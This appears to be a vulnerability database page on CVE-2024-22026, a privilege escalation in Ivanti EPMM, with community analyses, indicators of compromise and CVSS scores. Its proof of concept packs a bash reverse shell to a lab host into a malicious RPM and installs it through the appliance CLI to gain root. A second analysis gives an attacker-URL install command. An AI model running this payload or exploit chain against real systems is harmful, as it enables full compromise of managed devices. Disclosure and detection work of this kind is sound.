Attacker Value
Low
(2 users assessed)
Exploitability
High
(2 users assessed)
User Interaction
None
Privileges Required
High
Attack Vector
Local
2

CVE-2024-22026

Disclosure Date: May 22, 2024
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance.

Add Assessment

2
Ratings
Technical Analysis

Ivanti EPMM (previously known as MobileIron Core) is vulnerable to a local privilege escalation vulnerability. The install command accessible from the MobileIron CORE CLI or Ivanti EPMM CLI allows privileged CLI users to install .rpm packages. Affected versions are versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1.

The install command fails to enforce signature verification or URL filtering of any sort when installing rpm from url allowing an attacker to host a malicious rpm package and have their victim download and install it with root privileges.

There exists an install binary on the on the affected appliance – please note that it is unrelated to the install command accessible from the CLI which is vulnerable to the priv esc:

which install
/bin/install
install --help
Usage: install [OPTION]... [-T] SOURCE DEST
  or:  install [OPTION]... SOURCE... DIRECTORY
  or:  install [OPTION]... -t DIRECTORY SOURCE...
  or:  install [OPTION]... -d DIRECTORY...

This install program copies files (often just compiled) into destination
locations you choose.  If you want to download and install a ready-to-use
package on a GNU/Linux system, you should instead be using a package manager
like yum(1) or apt-get(1).

To access the vulnerable command, one must first gain CLI access via SSH or physical access

➜ ssh msfuser@172.16.199.40
msfuser@172.16.199.40's password:
Last login: Mon Jun  3 14:12:12 2024 from 172.16.199.1
************************************************************
*                   MobileIron CORE CLI                    *
*                                                          *
*                                                          *
************************************************************
Welcome msfuser it is Mon Jun 3 15:00:14 UTC 2024
CORE(11.2.0.0-31)@lobster.example.com>

  enable      Turn on privileged commands
  exit        Exit from the EXEC
  help        Description of the interactive help system
  host        Query Internet name servers
  logout      Exit from the EXEC
  ping        Send echo messages
  show        Show running system information
  speedtest   Performs speed test for disk memory and cpu
  timeout     CLI Idle timeout.
  traceroute  Trace route to destination

Then turn on privileged commands with enable followed by the correct Admin CLI password:

CORE(11.2.0.0-31)@lobster.example.com> enable
Password:
CORE(11.2.0.0-31)@lobster.example.com#install

  rpm  Gets the rpm and install. choose any from: cdrom file info url

CORE(11.2.0.0-31)@lobster.example.com#install rpm

  cdrom  Gets the rpm and install from cdrom
  file   Get and show the rpm(s) from the given file path and installs
  info   Gets list of rpms installed
  url    Gets the rpm and install from the given url

As outlined by securekomodo in the following blog post the CLI command install is really just a wrapper for the command:

/bin/rpm -Uvh *.rpm

Which will get run as root, allowing an attacker to host a malicious RPM package, install it and successfully escalate privileges.

Example PoC

Create a postinstall.sh script that will run as root after the .rpm package gets installed. Include your payload.

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ cat postinstall.sh
#!/bin/sh
bash -i >& /dev/tcp/172.16.199.131/443 0>&1
exit 0

Create the malicious .rpm package using the Ruby gem fpm:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ fpm -s dir -t rpm -n test-poc -v 2.0 -a i386 --description "MobileIron Reverse Shell" --maintainer "msfuser" --after-install postinstall.sh -C .
Created package {:path=>"test-poc-2.0-1.i386.rpm"}

Host the .rpm package via a Python HTTP server:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo python3 -m http.server 80
[sudo] password for msfuser:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Start a nc listener on our attacking machine:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo nc -l 443
[sudo] password for msfuser:

As previously demonstrated SSH to the vulnerable appliance or physically access theMobile Iron Core / Ivanti EPMM CLI and type enable followed by the Admin password in order to enable privileged commands. Once successfully authenticated use the vulnerable command to download and install the .rpm in the context of the root user.

CORE(11.2.0.0-31)@lobster.example.com#install rpm url http://172.16.199.131/test-poc-2.0-1.i386.rpm
--2024-06-03 16:04:48--  http://172.16.199.131/test-poc-2.0-1.i386.rpm
Connecting to 172.16.199.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49796 (49K) [application/x-redhat-package-manager]
Saving to: 'test-poc-2.0-1.i386.rpm'

100%[====================================================================================================================================================================================================================>] 49,796      --.-K/s   in 0.001s

2024-06-03 16:04:48 (32.7 MB/s) - 'test-poc-2.0-1.i386.rpm' saved [49796/49796]

Preparing...                          ################################# [100%]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   469  100   469    0     0   279k      0 --:--:-- --:--:-- --:--:--  458k
Updating / installing...
   1:test-poc-2.0-1                   ################################# [100%]

Check the nc listener and see that we’ve received a shell running in the context of the root user.

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo nc -l 443
[sudo] password for msfuser:
[root@lobster.example.com 2024-06-03--16-30-57 / #] id
id
uid=0(root) gid=0(root) groups=0(root)
[root@lobster.example.com 2024-06-03--16-42-52 / #] uname -a
uname -a
Linux lobster.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

To reset the target in order to retest, simply remove the package you just installed with:

CORE(11.2.0.0-31)@lobster.example.com#no install rpm test-poc-2.0-1.i386
Uninstalled  ivanti-privesc-13.37-1.i386 successfully.

IoCs

Unprivileged users can query logs from the Mobile Iron / Ivanti EPMM CLI. One way users can check for IoCs in by issuing the following command:

CORE(11.2.0.0-31)@lobster.example.com> show log messages
--log 'messages' --

The above command will allow the user to access /var/log/messages via the CLI. The below isn’t indicative of a successful exploit attempt, the following log lines will be present on a device where the user has installed malicious or trusted RPM packages using the CLI.

Jun  3 16:51:51 lobster installTools: Command: /bin/rpm -Uvh *.rpm successful
Jun  3 16:51:51 lobster installTools: Command: /bin/ls *.rpm  >> /mi/files/installedTools successful
Jun  3 16:51:52 lobster installTools: Command: /bin/rm * >& /dev/null successful
Jun  3 16:51:52 lobster installTools: Command: popd >& /dev/null successful
Jun  3 16:51:52 lobster installTools: RPM downloaded and installed successfully

Interestingly enough, it doesn’t seem this command completes successfully, despite it saying that it does. There is no reference to our malicious .rpm file in the file /mi/files/installedTools

Jun  3 16:51:51 lobster installTools: Command: /bin/ls *.rpm  >> /mi/files/installedTools successful

It gets created but is zero bytes:

[root@lobster.example.com 2024-06-03--17-31-48 files #] ls -l /mi/files/installedTools
ls -l /mi/files/installedTools
-rw-r--r-- 1 root root 0 Jun  3 17:27 /mi/files/installedTools

Also one can look at the current processes for tell tale signs of successful exploitation by running:

[root@lobster.example.com 2024-06-03--17-35-43 files #] ps aux
ps aux
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
...
root      63342  0.0  0.0 137500  5536 pts/0    S    17:27   0:00 /usr/bin/sudo /mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm
root      63345  0.0  0.0   9700  1584 pts/0    S    17:27   0:00 /bin/bash /mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm
root      63407  0.0  0.1  78976 10308 pts/0    S    17:27   0:00 /bin/rpm -Uvh test-poc-2.0-1.i386.rpm
root      63408  0.0  0.0   9564  1124 pts/0    S    17:27   0:00 /bin/sh /var/tmp/rpm-tmp.D6MXUG 1
root      63409  0.0  0.0 116004  2684 pts/0    S    17:27   0:00 bash -i

We can see that processes that were spawned in order to download and install our malicious rpm are still running.
If we get the PID from the reverse shell we confirm 63409 in the above is our reverse shell and the sink of our exploit.

[root@lobster.example.com 2024-06-03--17-37-12 files #] echo "My PID is $$"
echo "My PID is $$"
My PID is 63409

If we run the following we can get a bit more detail of the context of the root process spawned when this is exploited:

[root@lobster.example.com 2024-06-03--17-58-29 var #] ps auxe | grep 63409
ps auxe | grep 63409
root      63409  0.0  0.0 116004  2704 pts/0    S    17:27   0:00 bash -i XDG_SESSION_ID=2903 MI_DATE_FORMAT=%Y-%m-%d--%H-%M-%S TERM=xterm-256color SHELL=/bin/bash MI_DATE_COMMAND=date +%Y-%m-%d--%H-%M-%S USER=root SUDO_USER=msfuser SUDO_UID=2002 USERNAME=root RPM_INSTALL_PREFIX0=/ MAIL=/var/mail/root PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin _=/bin/bash PWD=/ JAVA_HOME=/usr/java/default HOME=/root SUDO_COMMAND=/mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm SHLVL=2 RPM_INSTALL_PREFIX=/ LOGNAME=root SUDO_GID=1001

Attacker Value and Exploitability Rating

I gave this vulnerability an attacker rating of 1/5 mainly due to the fact authentication to the CLI is required as well as the CLI Admin password in order to enable privileged commands to access the vulnerable command install.

Once the necessary credentials are obtained exploitation is straightforward: host the malicious package for the victim to download and install, then profit. However the need for such high credentials makes this vulnerability difficult to exploit in the real world.

1
Ratings
Technical Analysis

CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.

The appliance uses the following command to fetch and install RPM packages as a low privilege user. This of course means you must have CLI access:

install rpm url <remote url>

This above command is only a CLI wrapper for the following to occur which runs as root

/bin/rpm -Uvh *.rpm

This underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.

So you can root the appliance by hosting a malicious RPM with whatever commands you want, then fetch it using the standard update command on the Ivanti EPMM CLI, and your commands will run as root.

install rpm url http://<attacker_IP>/malicious.rpm

I have provided a POC here:
https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core

CVSS V3 Severity and Metrics
Base Score:
6.7 Medium
Impact Score:
5.9
Exploitability Score:
0.8
Vector:
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Local
Attack Complexity (AC):
Low
Privileges Required (PR):
High
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • ivanti

Products

  • endpoint manager mobile

References

Exploit
The following exploit POCs have not been verified by Rapid7 researchers, but are sourced from: nomi-sec/PoC-in-GitHub.
Additional sources will be added here as they become relevant.
Notes: We will only add the top 3 POCs for a given CVE. POCs added here must have at least 2 GitHub stars.

Additional Info

Technical Analysis